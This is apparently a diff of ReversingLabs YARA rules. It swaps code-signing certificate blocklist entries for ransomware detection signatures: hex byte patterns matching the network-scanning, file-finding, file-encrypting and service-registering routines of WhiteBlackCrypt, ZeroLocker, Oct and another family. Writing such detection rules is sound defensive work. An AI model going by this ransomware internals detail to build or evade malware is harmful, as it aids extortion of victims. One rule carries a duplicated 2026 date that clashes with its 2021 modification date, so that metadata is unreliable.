+            ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2
+            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF
+        }
+		$scan_network_p2 = {
+            15 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF
+            15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
+            ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ??
+            ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82
+            50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 2B
+            51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ?? B9
+            ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
+            ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B
+            42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA
+            ?? ?? ?? ?? 2B 51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
+            ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ??
+            33 C9 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B
+            55 ?? 33 C0 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
+            ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 5D ??
+            C7 45 ?? ?? ?? ?? ?? DD 45 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 41 ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+        }
+		$scan_network_p3 = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ??
+            ?? 52 8D 85 ?? ?? ?? ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 8B 02 89 85 ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ??
+            ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15
+            ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B 11 8B 85 ?? ?? ?? ?? 50 FF 52 ?? DB E2 89 85 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95
+            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 55 ?? 52
+            FF 15 ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 51 ?? DB E2 89
+            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
+        }
+		$scan_network_p4 = {
+            8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52
+            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 50 8D 4D ?? 51
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ??
+            51 FF 50 ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 9B 68 ?? ?? ?? ?? EB ?? 8D
+            4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ??
+            83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C3 8D 85 ?? ?? ??
+            ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? FF 15 ?? ?? ??
+            ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? C3 8B 4D
+            ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B 45 ?? 8B 4D ?? 64 89
+            0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Hua\\xE2\\x80\\x99nan Xingfa Electronic Equipment Firm" and pe.signatures [ i ] . serial == "1c:b2:d5:23:a6:bf:7a:06:66:42:c5:78:de:1c:9b:e4" and 1400889599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $scan_network_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3A6Ccabb1C62F3Be3Eb03869Fa43Dc4A : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Whiteblackcrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WhiteBlackCrypt ransomware."
 		author = "ReversingLabs"
-		id = "b16f7bb7-88fe-5f8f-9592-8d309f556419"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9855c10d-563d-54e0-bc79-945daef947de"
+		date = "2021-07-05"
+		modified = "2021-07-05"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2394-L2410"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.WhiteBlackCrypt.yara#L1-L91"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ccb603c8a5f4fb63876e78d763f80a97098c23aa10673c7b04a48026268f57d3"
+		logic_hash = "37b95cc3412f2f2d02d19c4c15b529c4f67453cb195627b5bab2f353e7602354"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WhiteBlackCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            41 57 41 56 41 55 41 54 55 57 56 53 48 83 EC ?? 4C 8D 3D ?? ?? ?? ?? 45 31 F6 49 89
+            CD E8 ?? ?? ?? ?? 48 85 C0 49 89 C4 0F 84 ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85
+            C0 0F 84 ?? ?? ?? ?? 48 8D 68 ?? 4C 89 FA 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D
+            15 ?? ?? ?? ?? 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 44 89 F0 48 83 C9 ?? 48 89 EF F2
+            AE 4C 89 EF 48 89 CB 48 83 C9 ?? F2 AE 48 F7 D3 48 F7 D1 01 D9 48 63 D9 48 89 D9 E8
+            ?? ?? ?? ?? 48 89 D9 4C 89 EA 48 89 C6 48 89 C7 44 89 F0 F3 AA 48 89 F1 E8 ?? ?? ??
+            ?? 48 8D 15 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 48 89 EA 48 89 F1 E8 ?? ?? ?? ?? 48
+            89 F1 E8 ?? ?? ?? ?? 48 89 F1 85 C0 74 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 89
+            F1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 E1 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E
+            41 5F E9 ?? ?? ?? ?? 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$encrypt_files = {
+            41 55 41 54 55 57 56 53 48 83 EC ?? 48 8D 15 ?? ?? ?? ?? 31 F6 4C 8D 2D ?? ?? ?? ??
+            48 89 CD E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C3 E8 ?? ?? ?? ?? 48 89 C7 49 89 D9 41
+            B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 85 C0 49 89 C4 74 ?? 81 FE ??
+            ?? ?? ?? 7F ?? 45 89 E0 48 89 FA 4C 89 E9 E8 ?? ?? ?? ?? 45 31 C0 89 F2 48 89 D9 E8
+            ?? ?? ?? ?? 44 01 E6 4D 63 C4 48 89 F9 49 89 D9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 31
+            C0 89 F2 48 89 D9 E8 ?? ?? ?? ?? EB ?? 48 89 F9 48 89 EF E8 ?? ?? ?? ?? 48 89 D9 E8
+            ?? ?? ?? ?? 31 C0 48 83 C9 ?? F2 AE 48 89 CE 48 F7 D6 48 89 F1 48 83 C1 ?? E8 ?? ??
+            ?? ?? 48 89 EA 48 89 C1 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 89 E9 48 89 C2 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D E9
+        }
+		$register_service_p1 = {
+            57 56 53 48 81 EC ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 31 C0 41 B9 ?? ?? ?? ?? 48 8D 94
+            24 ?? ?? ?? ?? 48 89 CB B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 D7 F3 AB 48 8D
+            44 24 ?? 48 89 54 24 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48
+            C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 48 8B 35 ?? ?? ??
+            ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 41 B8 ?? ?? ?? ?? 48 89 DA FF 15
+            ?? ?? ?? ?? 48 8D 44 24 ?? 45 31 C0 41 B9 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ??
+            ?? ?? 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8D 05 ?? ?? ?? ?? 48 8B
+            4C 24 ?? 41 B9 ?? ?? ?? ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
+            89 44 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            45 31 C0 48 89 D9 FF 15 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 31 C9 FF D6 48 85 C0 79 ??
+            B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 31 C9 BA ?? ??
+            ?? ?? 48 C1 E0 ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ??
+            ?? 48 8D 35 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 48 8D
+        }
+		$register_service_p2 = {
+            8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            41 B9 ?? ?? ?? ?? 48 89 F2 48 89 1D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ??
+            48 8B 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
+            ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D6 B9 ?? ?? ?? ?? 48 89 C3 FF 15 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 48 89 D9 49 89 C0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D
+            54 24 ?? 48 89 C1 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 41 B9 ?? ??
+            ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ??
+            ?? ?? ?? ?? 48 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 99 F7 F9 2D ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 99 F7 F9 31 C9 48 8D 15 ?? ?? ??
+            ?? 2D ?? ?? ?? ?? 89 44 24 ?? FF D6 BA ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89
+            D9 FF 15 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8D 5C 24 ?? 45 31 C9 45 31 C0 31 D2 48
+            89 D9 FF D6 85 C0 74 ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? EB ??
+            8B 84 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5E 5F C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB8\\xB8\\xE5\\xB7\\x9E\\xE9\\xAA\\x8F\\xE6\\x99\\xAF\\xE9\\x80\\x9A\\xE8\\x81\\x94\\xE6\\x95\\xB0\\xE5\\xAD\\x97\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "3a:6c:ca:bb:1c:62:f3:be:3e:b0:38:69:fa:43:dc:4a" and 1259798399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $register_service_p* ) ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_864196F01971Dbec7002B48642A7013A : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Zerolocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ZeroLocker ransomware."
 		author = "ReversingLabs"
-		id = "80478430-ce01-5fae-bcaf-2b7a445bc20d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "291b5640-387c-54d9-97a6-13823932fa60"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2412-L2430"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.ZeroLocker.yara#L1-L70"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a3173bb08e673caaa64ab22854840a135e891044b165bbc67733c951ec6aa991"
+		logic_hash = "147e4b390bcfaff8f05059c1d9a98b50f544fc32e820406417894fe5046e0f71"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ZeroLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_routine_1 = {
+            00 28 5B 00 00 0A 20 ?? 07 00 00 28 60 00 00 06 13 09 20 ?? 07 00 00 28 60 00 00 06 13
+            0B 02 03 20 ?? 07 00 00 28 60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D
+            1B 00 00 04 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 04 20 ?? 07 00 00 28 60 00 00 06 20
+            ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06
+            13 0B 02 7B 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06 6A 6F ?? 00 00 0A 00 20 ?? 07 00
+            00 28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 8D 1E 00 00 01 0A 20 ?? 07 00 00
+            28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 6A 13 04 20 ?? 07 00 00 28 60 00 00
+            06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A [0-2] 13 05 20 ?? 07 00 00 28 60 00 00 06 13
+            0B 73 ?? 00 00 0A 0C 20 ?? 07 00 00 28 60 00 00 06 13 0B 00 0E 05 20 ?? 07 00 00 28 60
+            00 00 06 59 13 0C 11 0C 45 02 00 00 00 02 00 00 00 ?? 00 00 00 2B ?? 00 20 ?? 07 00 00
+            28 60 00 00 06 13 0B 02 7B 1C 00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00
+            28 60 00 00 06 73 ?? 00 00 0A 0B 2B ?? 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C
+            00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A
+            0B 00 2B 62 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1B 00 00 04 06 20 ?? 07 00 00 28
+            60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 6F ?? 00 00 0A [0-2] 0D 20 ?? 07 00 00 28 60
+        }
+		$encrypt_routine_2 = {
+            00 00 06 13 0B 07 06 20 ?? 07 00 00 28 60 00 00 06 09 6F ?? 00 00 0A 00 20 ?? 07 00 00
+            28 60 00 00 06 13 0B 11 04 09 6A D6 13 04 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 04
+            11 05 FE 04 13 0D 11 0D 2D 86 ?? 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 4F 00 00 06 26
+            20 ?? 07 00 00 28 60 00 00 06 13 0B 07 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06
+            13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C
+            00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28
+            60 00 00 06 FE 01 13 0D 11 0D 2C 32 ?? 45 01 00 00 00 F6 FF FF FF 20 ?? 07 00 00 28 60
+            00 00 06 13 0B 03 73 ?? 00 00 0A 13 06 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 06 6F ??
+            00 00 0A 00 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28 60 00 00 06
+            FE 01 13 0D 11 0D 2C ?? [0-20] 20 ?? 07 00 00 28 60 00 00 06 13 0B 03 73 ?? 00 00 0A 13
+            07 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 07 6F ?? 00 00 0A 00 00 20 ?? ?? 00 00 28 60
+            00 00 06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? ?? 00 00 28 60 00 00 06 13 0B
+            02 7B 1C 00 00 04 6F ?? 00 00 0A 00 DD 3B 01 00 00 11 0A 2B 0D 11 0A 20 ?? ?? 00 00 28
+        }
+		$encrypt_routine_3 = {
+            60 00 00 06 58 20 ?? 08 00 00 28 60 00 00 06 13 0A 45 26 00 00 00 00 00 00 00 ?? FC FF
+            FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? ?? FF FF
+            ?? FD FF FF ?? FD FF FF ?? FD FF FF 00 00 00 00 ?? FD FF FF ?? FD FF FF ?? FD FF FF ??
+            FD FF FF ?? FD FF FF ?? FD FF FF ?? ?? FF FF ?? FD FF FF ?? FD FF FF ?? FD FF FF ?? ??
+            FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF
+            FF ?? FE FF FF E8 FE FF FF FC FE FF FF 10 FF FF FF 11 FF FF FF 29 FF FF FF 41 FF FF FF
+            DE 6D 11 0B 13 0A 11 09 20 ?? 08 00 00 28 60 00 00 06 30 16 ?? 45 01 00 00 00 F6 FF FF
+            FF 20 ?? 08 00 00 28 60 00 00 06 2B 02 11 09 45 02 00 00 00 00 00 00 00 11 FF FF FF DE
+            34 75 4B 00 00 01 14 FE 03 11 09 20 ?? 08 00 00 28 60 00 00 06 FE 03 5F 11 0A 20 ?? 08
+            00 00 28 60 00 00 06 FE 01 5F FE 11 74 4B 00 00 01 28 57 00 00 0A DE 93 20 ?? 08 00 00
+            28 60 00 00 06 28 ?? 00 00 0A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WLE DESENVOLVIMENTO DE SOFTWARE E ASSESSORIA LTDA EPP" and ( pe.signatures [ i ] . serial == "00:86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a" or pe.signatures [ i ] . serial == "86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a" ) and 1384300799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $encrypt_routine_1 and $encrypt_routine_2 and $encrypt_routine_3 )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Fda1E121B61Adeca936A6Aebe079303 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Oct : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Oct ransomware."
 		author = "ReversingLabs"
-		id = "fba98d6b-dc09-5294-ad86-2f4e0d8ad320"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "e811a0ba-52df-5e88-ab71-df91d5cb584a"
+		date = "2026-10-01"
+		date = "2026-10-01"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2432-L2448"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Oct.yara#L1-L68"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "70a04c83e79c98024bacf1688bb46d80c9b8491e25dd32d6d92bf3cf61c62e48"
+		logic_hash = "3973794d6bf26eaa752cfc70a217c059a190c63a0dd92b06de7c0893d92d9e88"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 03 0B 07 18 73 ?? ?? ?? ?? 0C 73
+            ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 04 06
+            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 19 6F ??
+            ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ??
+            ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 13 ?? 15 33
+            ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ??
+            13 ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A
+        }
+		$find_files = {
+            16 0A 38 ?? ?? ?? ?? 16 0B 2B ?? 02 06 9A 28 ?? ?? ?? ?? 2C ?? 02 06 9A 73 ?? ?? ?? ??
